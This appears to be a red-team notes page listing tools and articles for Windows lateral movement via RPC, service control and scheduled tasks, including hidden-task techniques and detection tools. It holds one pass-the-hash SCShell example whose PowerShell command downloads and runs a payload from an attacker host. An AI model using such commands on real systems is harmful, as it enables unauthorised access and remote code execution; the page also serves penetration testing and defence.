# RPC

* <https://sensepost.com/blog/2021/building-an-offensive-rpc-interface/>
* <https://github.com/s0i37/lateral>

## SCM

* <https://github.com/Mr-Un1k0d3r/SCShell>
* <https://github.com/juliourena/SharpNoPSExec>
* <https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Fileless%20Lateral%20Movement/Program.cs>

Using the Python [implementation](https://github.com/Mr-Un1k0d3r/SCShell/blob/master/scshell.py) of SCShell with pass-the-hash (PtH):

```
$ python scshell.py MEGACORP/snovvcrash@192.168.1.11 -hashes :fc525c9683e8fe067095ba2ddc971889 -service-name lfsvc
SCShell>C:\windows\system32\cmd.exe /c powershell.exe -nop -w hidden -c iex(new-object net.webclient).downloadstring('http://10.10.13.37:8080/payload.ps1')
```

## Task Scheduler

* <https://riccardoancarani.github.io/2021-01-25-random-notes-on-task-scheduler-lateral-movement/>
* <https://cymulate.com/blog/task-scheduler-new-vulnerabilities-for-schtasks-exe/>

### RPC

* [\[PDF\] Unorthodox Lateral Movement (Riccardo Ancarani)](https://github.com/RiccardoAncarani/talks/blob/master/F-Secure/unorthodox-lateral-movement.pdf)
* <https://github.com/Ridter/atexec-pro>

### Task Tampering

* <https://labs.withsecure.com/publications/scheduled-task-tampering>
* <https://github.com/jsecu/ModTask>

### Hidden Tasks

* <https://habr.com/ru/companies/rvision/articles/723050/>
* <https://rt-solar.ru/solar-4rays/blog/4839/>
* <https://github.com/4RAYS-by-SOLAR/taskcache-re-plugin>
* <https://github.com/BinaryDefense/HiddenTaskHunter/blob/main/hunt_hidden_tasks.ps1>

#### GhostTask

* <https://github.com/netero1010/GhostTask>
* <https://gist.github.com/Workingdaturah/991de2d176b4b8c8bafd29cc957e20c2>
* <https://github.com/dmcxblue/SharpGhostTask>

### Tools

* <https://github.com/mandiant/SharPersist>
* <https://github.com/RiccardoAncarani/TaskShell>
* <https://github.com/netero1010/ScheduleRunner>

#### go-msrpc / goexec

* <https://github.com/oiweiwei/go-msrpc>
* <https://www.falconops.com/blog/introducing-goexec>
* <https://github.com/FalconOpsLLC/goexec>

## Research / Fuzzing

* <https://www.incendium.rocks/posts/Automating-MS-RPC-Vulnerability-Research/>
* <https://github.com/warpnet/MS-RPC-Fuzzer>
